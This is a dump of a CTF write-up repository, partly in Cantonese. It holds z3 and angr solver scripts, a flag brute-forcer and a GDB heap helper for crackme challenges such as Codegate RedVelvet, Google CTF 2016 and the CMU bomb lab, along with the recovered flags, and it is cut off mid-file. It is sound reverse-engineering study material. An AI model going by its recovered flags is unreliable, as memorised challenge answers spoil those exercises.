p=subprocess.Popen(['asby.exe'],stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 5 | return p 6 | 7 | def tryflag(p, possible_flag): 8 | command = possible_flag + '\r\n' 9 | p.stdin.write(command) 10 | for i in range(len(possible_flag)): 11 | response=p.stdout.readline() 12 | if 'WRONG!' in response: 13 | return False 14 | return True 15 | 16 | p = getp() 17 | assert(tryflag(p, 'flag{')) 18 | assert(tryflag(p, 'flag{0')) 19 | 20 | flag = 'flag{' 21 | 22 | for x in range(32): 23 | 24 | for y in range(16): 25 | 26 | c = '%x' % y 27 | if tryflag(p,flag+c): 28 | print(flag) 29 | flag+=str(c) 30 | break 31 | 32 | 33 | 34 | flag += '}' 35 | print(flag) 36 | -------------------------------------------------------------------------------- /Tools/SHA2017 asby -PE fuzzing/readme.md: -------------------------------------------------------------------------------- 1 | # Reference 2 | 3 | 1.https://b0tchsec.com/2017/sha2017/asby(https://b0tchsec.com/2017/sha2017/asby) 4 | -------------------------------------------------------------------------------- /Tools/heap.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import re 3 | from gdb import * 4 | 5 | 6 | #from https://youtu.be/qFyoWH_5Clo?t=2827 7 | #source heap.py 8 | #ph command addr 9 | 10 | chunkptr=lookup_type('struct malloc_chunk').pointer() 11 | 12 | class PrintHeap(Command): 13 | 14 | def __init__(self): 15 | super (PrintHeap, self).__init__("ph",COMMAND_USER) 16 | 17 | def printchunk(self,addr): 18 | chunk=addr.cast(chunkptr).dereference() 19 | prevsize=chunk['prev_size'] 20 | size=chunk['size'] 21 | fd=chunk['fd'] 22 | bk=chunk['bk'] 23 | print ('Chunk @ 0x%x' % (addr)) 24 | 25 | if size&1: 26 | print(' prevsize: (inuse)') 27 | else: 28 | print(' prevsize: %d (0x%x)' % (prevsize,prevsize)) 29 | print(' size: %d (0x%x)'%(size&~7,size)) 30 | print(' fd: 0x%x' % (fd)) 31 | print(' bk: 0x%x' % (bk)) 32 | return chunk 33 | 34 | def printheap(self,addr): 35 | while True: 36 | chunk=self.printchunk(addr) 37 | print('') 38 | size=chunk['size']&~7 39 | if size>10000: 40 | break 41 | addr+=size 42 | 43 | def printbin(self,addr): 44 | b=addr.cast(chunkptr).dereference() 45 | chunk=b['fd'] 46 | while chunk !=addr: 47 | chunk=self. printchunk(chunk)['fd'] 48 | print ('') 49 | 50 | 51 | def invoke(self, arg, from_tty): 52 | args=arg.split() 53 | cmd=args[0] 54 | if len(args)>1: 55 | addr=parse_and_eval(args[1]) 56 | if cmd=='chunk': 57 | self.printchunk(addr) 58 | elif cmd=='mem': 59 | self.printchunk(addr-16) 60 | elif cmd=='heap': 61 | self.printheap(addr) 62 | 63 | ##for printing bin informations 64 | elif cmd=='bin': 65 | self.printheap(addr) 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /Tools/readme.md: -------------------------------------------------------------------------------- 1 | # Tools that built or copied from other writeup 2 | -------------------------------------------------------------------------------- /angr/BugsBunnyCTF 2017 rev150/readme.md: -------------------------------------------------------------------------------- 1 | # BugsBunnyCTF 2017 rev150 2 | 3 | 呢題其實唔難,不過可能有太多io,所以angr解唔到 4 | 5 | Ida Code: 6 | 7 | ```C++ 8 | 9 | { 10 | if ( !numeric(argv[1]) ) 11 | puts(4803080LL); 12 | if ( (unsigned __int8)ksjqdh(argv[1]) 13 | && (unsigned __int8)uiyzr(argv[1]) 14 | && (unsigned __int8)qdsdqq(argv[1]) 15 | && (unsigned __int8)euziry(argv[1]) 16 | && (unsigned __int8)mlhkjg(argv[1]) 17 | && (unsigned __int8)sndsqd(argv[1]) 18 | && (unsigned __int8)toyiup(argv[1]) 19 | && (unsigned __int8)huhgeg(argv[1]) 20 | && (unsigned __int8)nvjfkv(argv[1]) 21 | && (unsigned __int8)jncsdkjf(argv[1]) 22 | && (unsigned __int8)ieozau(argv[1]) 23 | && (unsigned __int8)jqsgdd(argv[1]) 24 | && (unsigned __int8)msdlmkfd(argv[1]) 25 | && (unsigned __int8)nhdgrer(argv[1]) 26 | && (unsigned __int8)fs546sdf(argv[1]) 27 | && (unsigned __int8)sdff564sd(argv[1]) 28 | && (unsigned __int8)sdff564s(argv[1]) 29 | && (unsigned __int8)sdff564s7(argv[1]) 30 | && (unsigned __int8)sdff564s8(argv[1]) 31 | && (unsigned __int8)sdff564(argv[1]) 32 | && (unsigned __int8)sdff564g5(argv[1]) 33 | && (unsigned __int8)sdff564g8(argv[1]) 34 | && (unsigned __int8)sdff564k3(argv[1]) ) 35 | { 36 | v3 = argv[1]; 37 | printf(40); 38 | } 39 | 40 | ``` 41 | 42 | 支flag要satisfy呢n個 check statement 43 | 44 | 當然就z3見 45 | 46 | ``` 47 | sat 48 | [p = 7, 49 | k = 9, 50 | n = 9, 51 | d = 1, 52 | e = 3, 53 | j = 7, 54 | o = 5, 55 | i = 5, 56 | s = 1, 57 | b = 2, 58 | f = 7, 59 | l = 0, 60 | q = 8, 61 | a = 4, 62 | g = 2, 63 | r = 8, 64 | t = 2, 65 | c = 8, 66 | h = 4, 67 | m = 3] 68 | ``` 69 | flag:BugsBunny{42813724579039578812} 70 | 71 | 72 | # Remark 73 | 74 | 1.睇其他writeup先發現可以咁入constraint .... 75 | 76 | ```python 77 | for i in range(20): 78 | 79 | s.append(Int('s['+str(i)+']')) 80 | 81 | ``` 82 | 慘 83 | 84 | 85 | 2.Bitvec is for register ~~~~~~ 86 | 87 | 3.留意divison zero,如果唔係有可能 multiple solution 慘 88 | -------------------------------------------------------------------------------- /angr/BugsBunnyCTF 2017 rev150/rev150: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/BugsBunnyCTF 2017 rev150/rev150 -------------------------------------------------------------------------------- /angr/BugsBunnyCTF 2017 rev150/solve.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | FLAG_LENGTH = 20 4 | 5 | 6 | a=Int('a') 7 | b=Int('b') 8 | c=Int('c') 9 | d=Int('d') 10 | e=Int('e') 11 | f=Int('f') 12 | g=Int('g') 13 | h=Int('h') 14 | i=Int('i') 15 | j=Int('j') 16 | k=Int('k') 17 | l=Int('l') 18 | m=Int('m') 19 | n=Int('n') 20 | o=Int('o') 21 | p=Int('p') 22 | q=Int('q') 23 | r=Int('r') 24 | s=Int('s') 25 | t=Int('t') 26 | 27 | 28 | sol = Solver() 29 | 30 | sol.add(p+e==10) 31 | sol.add(b*s==2) 32 | sol.add(p/j==1) 33 | sol.add(j!=0) 34 | 35 | sol.add(f-r==-1) 36 | sol.add(p-b==5) 37 | sol.add(b*k==18) 38 | sol.add(i+n==14) 39 | sol.add(s*i==5) 40 | sol.add(e*l==0) 41 | sol.add(i+j==12) 42 | sol.add(m-t==1) 43 | sol.add(j%r==7) 44 | sol.add(r!=0) 45 | 46 | sol.add(o*q==40) 47 | sol.add(h-e==1) 48 | sol.add(g+a==6) 49 | sol.add(c-q==0) 50 | sol.add(e-g==1) 51 | sol.add(a%f==4) 52 | sol.add(f!=0) 53 | sol.add(p!=0) 54 | 55 | sol.add(f*l==0) 56 | sol.add(k%p==2) 57 | sol.add(l/d==0) 58 | sol.add(d!=0) 59 | 60 | sol.add(o-n==-4) 61 | sol.add(s+t==3) 62 | 63 | print(sol.check()) 64 | print(sol.model()) 65 | -------------------------------------------------------------------------------- /angr/Codegate_CTF_2018_Preliminary/RedVelvet/afbea1c0a463d63cd6f00389a3b2fe88: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/Codegate_CTF_2018_Preliminary/RedVelvet/afbea1c0a463d63cd6f00389a3b2fe88 -------------------------------------------------------------------------------- /angr/Codegate_CTF_2018_Preliminary/RedVelvet/byangr.py: -------------------------------------------------------------------------------- 1 | #using posix for question input with fgets ... 2 | import angr 3 | proj = angr.Project('./RedVelvet', auto_load_libs=False) 4 | target=[0x00000000004015F9] 5 | avoid=[0x4009f7,0x4009ed] 6 | st = proj.factory.entry_state() 7 | 8 | for _ in xrange(26): 9 | k = st.posix.files[0].read_from(1) 10 | st.se.add(k != 0) 11 | st.se.add(k != 10) 12 | st.se.add(k>=0x20) 13 | st.se.add(k<=0x7e) 14 | 15 | #constraint last byte as "\n" 16 | k = st.posix.files[0].read_from(1) 17 | st.se.add(k == 10) 18 | 19 | 20 | #constraint size as 27 21 | st.posix.files[0].seek(0) 22 | st.posix.files[0].length = 27 23 | 24 | 25 | pg = proj.factory.path_group(st) 26 | pg.explore(find=target,avoid=avoid) 27 | 28 | print pg.found 29 | 30 | print pg.found[0].posix.dumps(0) 31 | 32 | 33 | 34 | # will got this :What_You_Wanna_Be?:)_lc_la\n but has got one successful run with What_You_Wanna_Be?:)_la_la\n , probably the int overflow issue in func14 affected the sat solver 35 | -------------------------------------------------------------------------------- /angr/Codegate_CTF_2018_Preliminary/RedVelvet/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```python 5 | >>> import angr 6 | WARNING | 2018-02-05 10:40:47,352 | angr.analyses.disassembly_utils | Your verison of capstone does not support MIPS instruction groups. 7 | >>> proj = angr.Project('./RedVelvet', auto_load_libs=False) 8 | >>> simgr.explore(find=lambda s: "flag : {" in s.posix.dumps(1)) 9 | Traceback (most recent call last): 10 | File "", line 1, in 11 | NameError: name 'simgr' is not defined 12 | >>> simgr = proj.factory.simgr() 13 | >>> simgr.explore(find=lambda s: "flag : {" in s.posix.dumps(1)) 14 | WARNING | 2018-02-05 10:42:22,015 | angr.engines.successors | Exit state has over 257 possible solutions. Likely unconstrained; skipping. 15 | WARNING | 2018-02-05 10:46:39,689 | angr.state_plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing. 16 | 17 | >>> s 18 | Traceback (most recent call last): 19 | File "", line 1, in 20 | NameError: name 's' is not defined 21 | >>> s.found 22 | Traceback (most recent call last): 23 | File "", line 1, in 24 | NameError: name 's' is not defined 25 | >>> s = simgr.found[0] 26 | >>> print s.posix.dumps(1) 27 | Your flag : HAPPINESS:) 28 | HAPPINESS:) 29 | HAPPINESS:) 30 | HAPPINESS:) 31 | HAPPINESS:) 32 | HAPPINESS:) 33 | HAPPINESS:) 34 | HAPPINESS:) 35 | HAPPINESS:) 36 | HAPPINESS:) 37 | HAPPINESS:) 38 | HAPPINESS:) 39 | HAPPINESS:) 40 | HAPPINESS:) 41 | HAPPINESS:) 42 | flag : {" What_You_Wanna_Be?:)_lc_la "} 43 | 44 | >>> flag = s.posix.dumps(0) 45 | >>> print(flag) 46 | What_You_Wanna_Be?:)_lc_la** ��J��??*JJ�* 47 | �*JJJ� 48 | �* 49 | >>> 50 | ``` 51 | -------------------------------------------------------------------------------- /angr/Codegate_CTF_2018_Preliminary/RedVelvet/solve.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | 4 | s = Solver() 5 | 6 | for i in range(0,26): 7 | globals()['v%i' % i] = BitVec('v%i' % i,32) 8 | 9 | #func1(v0, v1); 10 | s.add(v0*2*(v0^v1)-v1==10858) 11 | s.add(v0>85) 12 | s.add(v0<=95) 13 | s.add(v1>96) 14 | s.add(v1<=111) 15 | 16 | #func2(v1, v2); 17 | s.add(v1%v2==7) 18 | s.add(v2>90) 19 | 20 | #func3(v2, v3); 21 | s.add((v2/v3)+(v2^v3)==21) 22 | s.add(v2<=99) 23 | s.add(v3<=119) 24 | 25 | # # #func4(v3, v4); 26 | s.add((v3%v4)+v3==137) 27 | s.add(v4==95) 28 | 29 | # #func5(v4, v5); 30 | #s.add(((v4+v5)^(v4^v5^v4))==255) < crash here?? 31 | 32 | s.add(v5<=89) 33 | s.add(v5>85) 34 | 35 | #func6(v5, v6, v7); 36 | s.add(v5<=v6) 37 | s.add(v6<=v7) 38 | s.add(v6>110) 39 | s.add(v7>115) 40 | s.add((v6+v7)^(v5+v6)==44) 41 | s.add(((v6+v7)%v5)+v6==161) 42 | 43 | 44 | #func7(v7, v8, v9); 45 | s.add(v7>=v8) 46 | s.add(v8>=v9) 47 | s.add(v7<=119) 48 | s.add(v8>90) 49 | s.add(v9<=89) 50 | s.add((v7+v9)^(v8+v9)==122) 51 | s.add(((v7+v9)%v8)+v9==101) 52 | 53 | 54 | 55 | #func8(v9, v10, v11); 56 | s.add(v9<=v10) 57 | s.add(v10<=v11) 58 | s.add(v11<=114) 59 | s.add(((v9+v10))/v11*v10==97) 60 | s.add((v11^(v9-v10))*v10==-10088) 61 | 62 | 63 | 64 | #func9(v11, v12, v13); 65 | s.add(v11==v12) 66 | s.add(v12>=v13) 67 | s.add(v13<=99) 68 | s.add(v13+(v11*(v13-v12))-v11==-1443) 69 | 70 | 71 | 72 | #func10(v13, v14, v15); 73 | s.add(v13>=v14) 74 | s.add(v14>=v15) 75 | s.add(v14*(v13+v15+1)-v15==15514) 76 | s.add(v14>90) 77 | s.add(v14<=99) 78 | 79 | 80 | 81 | #func11(v15, v16, v17); 82 | s.add(v16>=v15) 83 | s.add(v15>=v17) 84 | s.add(v16>100) 85 | s.add(v16<=104) 86 | s.add(v15+(v16^(v16-v17))-v17==70) 87 | s.add(((v16+v17)/v15)+v15==68) 88 | 89 | 90 | #func12(v17, v18, v19); 91 | s.add(v17>=v18) 92 | s.add(v18>=v19) 93 | s.add(v18<=59) 94 | s.add(v19<=44) 95 | s.add(v17+(v18^(v18+v19))-v19==111) 96 | s.add((v18^(v18-v19))+v18==101) 97 | 98 | 99 | 100 | #func13(v19, v20, v21); 101 | s.add(v19<=v20) 102 | s.add(v20<=v21) 103 | s.add(v19>40) 104 | s.add(v20>90) 105 | s.add(v21<=109) 106 | s.add(v21+(v20^(v21+v19))-v19==269) 107 | s.add((v21^(v20-v19))+v20==185) 108 | 109 | 110 | 111 | #func14(v21, v22, v23); 112 | s.add(v21>=v23) 113 | s.add(v22>=v23) 114 | s.add(v22<=99) 115 | s.add(v23>90) 116 | s.add(v21+(v22^(v22+v21))==185+v23) #=v25) 122 | s.add(v24>=v23) 123 | s.add(v25>95) 124 | s.add(v24<=109) 125 | s.add(((v24-v23)*v24^v25)-v23==1214) 126 | s.add(((v25-v24)*v25^v23)+v24==-1034) 127 | 128 | print s.check() 129 | modl=s.model() 130 | res = "" 131 | for i in range(0,26): 132 | obj = globals()['v%i' % i] 133 | c = modl[obj].as_long() 134 | print('v%i: %x' % (i, c)) 135 | res = res + chr(c) 136 | print res 137 | 138 | 139 | print res 140 | -------------------------------------------------------------------------------- /angr/Google CTF 2016 google2016_unbreakable_0/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/Google CTF 2016 google2016_unbreakable_0/1.png -------------------------------------------------------------------------------- /angr/Google CTF 2016 google2016_unbreakable_0/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/Google CTF 2016 google2016_unbreakable_0/2.png -------------------------------------------------------------------------------- /angr/Google CTF 2016 google2016_unbreakable_0/readme.md: -------------------------------------------------------------------------------- 1 | [Google CTF 2016] google2016 unbreakable 0 2 | =============================================== 3 | 4 | 呢條題目出現係/angr-dev/example 5 | 6 | 直接拎左個binary黎玩 7 | 8 | string length=0x43 9 | 10 | 11 | ![alt text](1.png) 12 | 13 | 14 | address 15 | 16 | ![alt text](2.png) 17 | 18 | 19 | 呢條其實唔難either z3 or angr 20 | 21 | 要注意一個點就係 22 | 23 | ```python 24 | #By default there's only 60 symbolic bytes, which is too small for this case 25 | #This region is tunable in case of any out bound error found 26 | state.libc.buf_symbolic_bytes=str__len +1 27 | #state.libc.buf_symbolic_bytes = 500 28 | ``` 29 | 30 | 自己打完一次,都卡呢個位 31 | 32 | 33 | 34 | 由於pass argv係command line執行,所以要用 35 | 36 | ```python 37 | #use claripy if is argv type passing 38 | input_string = angr.claripy.BVS("input_string", 8 * str__len) 39 | 40 | state = proj.factory.entry_state(args=["./unbreakable-enterprise-product-activation", input_string], add_options={simuvex.o.LAZY_SOLVES}) 41 | 42 | ``` 43 | 44 | 45 | 46 | 47 | 48 | 49 | Reference 50 | ========================== 51 | 1. Script in angr-dev/example 52 | 53 | 2. [Z3 solution 1](https://p1kachu.pluggi.fr/writeup/re/2016/05/01/googlectf-unbreakable-writeup/) 54 | 55 | 3. [Z3 solution 2](http://tkmr.hatenablog.com/entry/2016/08/19/011529) 56 | 57 | 4. [angr writeup 1](http://hack.carleton.team/2016/05/05/google-ctf-2016-unbreakable-enterprise-product-activation-150-points/) 58 | 59 | 5. [angr writeup 2](http://yuanvi.cn/2016/05/01/angr-google-ctf) 60 | 61 | 6. [angr writeup 3](http://www.99cruster.com/blog/2016/05/02/google-ctf-2016-unbreakable-enterprise-product-activation-writeup-using-angr/) 62 | 63 | -------------------------------------------------------------------------------- /angr/Google CTF 2016 google2016_unbreakable_0/solve_google_ctf_2016_0.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import simuvex 3 | 4 | 5 | ##begin= (since it is an argv passing,no need to include begin address) 6 | avoid=0x400850 7 | target=0x400830 8 | str__len=0x43 9 | 10 | proj = angr.Project('unbreakable-enterprise-product-activation', load_options={"auto_load_libs": False}) 11 | 12 | 13 | #use claripy if is argv type passing 14 | input_string = angr.claripy.BVS("input_string", 8 * str__len) 15 | 16 | state = proj.factory.entry_state(args=["./unbreakable-enterprise-product-activation", input_string], add_options={simuvex.o.LAZY_SOLVES}) 17 | 18 | #By default there's only 60 symbolic bytes, which is too small for this case 19 | #This region is tunable in case of any out bound error found 20 | state.libc.buf_symbolic_bytes=str__len +1 21 | #state.libc.buf_symbolic_bytes = 500 22 | 23 | 24 | #Constraint to printable strings 25 | for byte in input_string.chop(8): 26 | state.add_constraints(byte >= ' ') # '\x20' 27 | state.add_constraints(byte <= '~') # '\x7e' 28 | state.add_constraints(byte != 0) # null 29 | 30 | 31 | path = proj.factory.path(state=state) 32 | 33 | ex = proj.surveyors.Explorer(start=path, find=target, avoid=avoid) 34 | 35 | ex.run() 36 | 37 | state = ex.found[0].state 38 | 39 | 40 | print 'Found:', state.se.any_str(input_string) 41 | -------------------------------------------------------------------------------- /angr/Google CTF 2016 google2016_unbreakable_0/unbreakable-enterprise-product-activation: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/Google CTF 2016 google2016_unbreakable_0/unbreakable-enterprise-product-activation -------------------------------------------------------------------------------- /angr/MeePwn CTF- Missing Hash/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/1.png -------------------------------------------------------------------------------- /angr/MeePwn CTF- Missing Hash/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/2.png -------------------------------------------------------------------------------- /angr/MeePwn CTF- Missing Hash/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/3.png -------------------------------------------------------------------------------- /angr/MeePwn CTF- Missing Hash/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/4.png -------------------------------------------------------------------------------- /angr/MeePwn CTF- Missing Hash/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/5.png -------------------------------------------------------------------------------- /angr/MeePwn CTF- Missing Hash/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/6.png -------------------------------------------------------------------------------- /angr/MeePwn CTF- Missing Hash/crackme2_fix4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/crackme2_fix4.exe -------------------------------------------------------------------------------- /angr/MeePwn CTF- Missing Hash/solve.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | # load the binary into an angr project. 4 | proj = angr.Project('crackme2_fix4.exe', load_options={"auto_load_libs": False}) 5 | # I'm going to skip all the beginning of the program. 6 | state = proj.factory.entry_state(addr=0x004015B6) 7 | 8 | # scanf() reads from stdin and stores it a this address 9 | bind_addr = 0x040305A 10 | # a symbolic input string with a length up to 10 bytes 11 | input_string = state.se.BVS("input_string", 8 * 10) 12 | # To be safe, I'm constraining input string. They are printable characters 13 | for byte in input_string.chop(8): 14 | state.add_constraints(byte >= ' ') # '\x20' 15 | state.add_constraints(byte <= '~') # '\x7e' 16 | state.add_constraints(byte != 0) # null 17 | 18 | # bind the symbolic string at bind_addr 19 | state.memory.store(bind_addr, input_string) 20 | 21 | # Attempt to find a path 22 | path = proj.factory.path(state=state) 23 | #ex = proj.surveyors.Explorer(start=path, find=0x401B21, avoid=0x00401B1) 24 | 25 | ex = proj.surveyors.Explorer(start=path, find=0x401B21, avoid=0x00401B13) 26 | 27 | ex.run() 28 | 29 | state = ex.found[0].state 30 | # We know all the values at: 0x403040, 0x403042, 0x403044, 0x403046, 0x403048, 0x40304A, 0x40304C, 0x40304E, 0x403050 31 | for i in range(18): 32 | state.add_constraints(state.memory.load(0x408040 + i, 1) == 0) 33 | # We know the flag starts with "Z" and ends with "!" 34 | state.add_constraints(state.memory.load(bind_addr + 9, 1) == '!') 35 | state.add_constraints(state.memory.load(bind_addr, 1) == 'Z') 36 | 37 | print 'Found:', state.se.any_str(input_string) 38 | # Zer0C0d3r! 39 | # 2.7s 40 | -------------------------------------------------------------------------------- /angr/VXCTF 2nd Simple REVERSE/readme.md: -------------------------------------------------------------------------------- 1 | # VXCTF 2nd Simple REVERSE 2 | 3 | Question: 4 | 5 | >Simple REVERSE 6 | >Very simple!Just brute-force it! 7 | > 8 | >[rev](rev) 9 | 10 | 11 | 首先ida左佢 12 | 13 | ```C++ 14 | scanf("%39s", &s, envp); 15 | if ( strlen(&s) > 0x26 16 | && v16 + 2 * s + 8 * v42 == 954 17 | && v12 + 2 * v5 + 2 * v16 == 416 18 | && s + 5 * v42 == 554 19 | && v37 + 3 * v20 - v39 == 137 20 | && v36 + v38 - v20 == 102 21 | && 2 * (v41 + v42 + v40) == 628 22 | && v26 + v24 + v14 - v32 == 180 23 | && v36 + v39 + v20 == 213 24 | && v10 - v27 + v30 == 66 25 | && 2 * v10 - v31 == 1 26 | && v23 + v41 == 210 27 | && v6 - v8 + v18 == 95 28 | && v7 + v28 == 228 29 | && v27 - v10 == 50 30 | && v19 + v5 + v39 == 335 31 | && v5 + 3 * v39 == 435 32 | && v19 - v5 + v28 == 131 33 | && v9 - v5 + v28 == 109 34 | && 2 * v39 + v32 == 320 35 | && 4 * v15 - v11 - v18 - v21 == 140 36 | && v8 + 3 * v33 == 437 37 | && v17 + v11 + v18 == 324 38 | && v22 + v33 == 218 39 | && v17 + v21 + v41 == 313 40 | && v11 + v41 == 209 41 | && v17 + v11 - v22 == 125 42 | && 3 * (v26 + v10) + v32 == 398 43 | && v22 + v10 + v26 == 204 44 | && v24 + v40 == 233 45 | && v11 - v22 == 6 46 | && v25 == v31 47 | && 2 * v24 - v10 == 190 48 | && v31 + 2 * v22 + 2 * v35 == 535 49 | && v35 + v22 + v36 == 271 50 | && v34 + v22 - v36 == 170 51 | && v29 - v34 + v36 == 51 52 | && v41 + v34 + v23 - v29 - 2 * v13 == 20 53 | && v34 + 2 * v13 - v23 - v41 == 97 54 | && v34 + 2 * v10 - v31 == 118 ) 55 | { 56 | puts("Congratulations!"); 57 | result = 0; 58 | } 59 | else 60 | { 61 | puts("Bye~"); 62 | result = 0; 63 | } 64 | return result; 65 | ``` 66 | 67 | Condition 好簡單,只要入支岩嘅flag就會出configurations 68 | 69 | 咁就用z3 solver打constraint 70 | 71 | solve完之後,harry大大就同我講原來配合global可以唔洗手打constraint -_- 72 | 73 | 呢到就紀錄底harry個solution 74 | 75 | [solve.py](solve.py) 76 | -------------------------------------------------------------------------------- /angr/VXCTF 2nd Simple REVERSE/rev: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/VXCTF 2nd Simple REVERSE/rev -------------------------------------------------------------------------------- /angr/VXCTF 2nd Simple REVERSE/solve.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | 4 | s = Solver() 5 | for i in range(4,43): 6 | globals()['v%i' % i] = Int('v%i' % i) 7 | 8 | s.add(And(v16 + 2 * v4 + 8 * v42 == 954 9 | , v12 + 2 * v5 + 2 * v16 == 416 10 | , v4 + 5 * v42 == 554 11 | , v37 + 3 * v20 - v39 == 137 12 | , v36 + v38 - v20 == 102 13 | , 2 * (v41 + v42 + v40) == 628 14 | , v26 + v24 + v14 - v32 == 180 15 | , v36 + v39 + v20 == 213 16 | , v10 - v27 + v30 == 66 17 | , 2 * v10 - v31 == 1 18 | , v23 + v41 == 210 19 | , v6 - v8 + v18 == 95 20 | , v7 + v28 == 228 21 | , v27 - v10 == 50 22 | , v19 + v5 + v39 == 335 23 | , v5 + 3 * v39 == 435 24 | , v19 - v5 + v28 == 131 25 | , v9 - v5 + v28 == 109 26 | , 2 * v39 + v32 == 320 27 | , 4 * v15 - v11 - v18 - v21 == 140 28 | , v8 + 3 * v33 == 437 29 | , v17 + v11 + v18 == 324 30 | , v22 + v33 == 218 31 | , v17 + v21 + v41 == 313 32 | , v11 + v41 == 209 33 | , v17 + v11 - v22 == 125 34 | , 3 * (v26 + v10) + v32 == 398 35 | , v22 + v10 + v26 == 204 36 | , v24 + v40 == 233 37 | , v11 - v22 == 6 38 | , v25 == v31 39 | , 2 * v24 - v10 == 190 40 | , v31 + 2 * v22 + 2 * v35 == 535 41 | , v35 + v22 + v36 == 271 42 | , v34 + v22 - v36 == 170 43 | , v29 - v34 + v36 == 51 44 | , v41 + v34 + v23 - v29 - 2 * v13 == 20 45 | , v34 + 2 * v13 - v23 - v41 == 97 46 | , v34 + 2 * v10 - v31 == 118 )) 47 | if s.check() == sat: 48 | print s.model() 49 | -------------------------------------------------------------------------------- /angr/cmu_bomb_lab_ref/bomb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/cmu_bomb_lab_ref/bomb -------------------------------------------------------------------------------- /angr/cmu_bomb_lab_ref/bomb.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | #start_addr=0x400efc 4 | target_addr=0x400f3c 5 | avoid_addr=0x40143a 6 | explode=(0x400f10,0x400f20) 7 | 8 | start = 0x400f0a 9 | #start = 0x400f0a # Where the path begin 10 | end = 0x400f3c # Where we want to go 11 | explode = (0x400f10, 0x400f20) # The addresses of explosions 12 | 13 | proj = angr.Project('./bomb', load_options={'auto_load_libs':False}) # load the binary 14 | 15 | state = proj.factory.blank_state(addr=start) # Create the path 16 | 17 | # Push the 6 digit returned by our read_six_numbers function. 18 | for i in xrange(6): 19 | state.stack_push(state.se.BVS('int_{}'.format(i), 4*8)) 20 | 21 | # Create and explore the function 22 | path = proj.factory.path_group(state) 23 | ex = path.explore(find=end, avoid=explode) 24 | 25 | if ex.found: 26 | found = ex.found[0].state 27 | 28 | answer = [] 29 | 30 | # Pop 3 64bit integer from the stack 31 | # we will convert it to 32 bit values 32 | 33 | for x in xrange(3): 34 | curr_int = found.se.any_int(found.stack_pop()) 35 | 36 | answer.append(str(curr_int & 0xffffffff)) 37 | answer.append(str(curr_int >> 32)) 38 | 39 | print(" ".join(answer)) -------------------------------------------------------------------------------- /angr/cmu_bomb_lab_ref/bomb2.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | start = 0x400F60 4 | #start = 0x400f0a # Where the path begin 5 | end = 0x400FC9 # Where we want to go 6 | explode = (0x400fc4, 0x400fad,0x400F65) # The addresses of explosions 7 | 8 | proj = angr.Project('./bomb', load_options={'auto_load_libs':False}) # load the binary 9 | 10 | state = proj.factory.blank_state(addr=start) # Create the path 11 | 12 | # Push the 2 digit returned by our scanf. 13 | for i in xrange(2): 14 | state.stack_push(state.se.BVS('int_{}'.format(i), 4*8)) 15 | 16 | # Create and explore the function 17 | path = proj.factory.path_group(state) 18 | ex = path.explore(find=end, avoid=explode) 19 | 20 | if ex.found: 21 | found = ex.found[0].state 22 | 23 | answer = [] 24 | 25 | # Pop 3 64bit integer from the stack 26 | # we will convert it to 32 bit values 27 | # 1 64bit integer is 2 number 28 | # pop 3 mean out put 6 29 | for x in xrange(3): 30 | curr_int = found.se.any_int(found.stack_pop()) 31 | 32 | answer.append(str(curr_int & 0xffffffff)) 33 | answer.append(str(curr_int >> 32)) 34 | 35 | print(" ".join(answer)) -------------------------------------------------------------------------------- /angr/cmu_bomb_lab_ref/bomb_layer5.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | start = 0x401062 #start point of phase5 4 | #start = 0x40107f #start point of phase5 no ok 5 | end = 0x4010EE # Where we want to go 6 | explode = 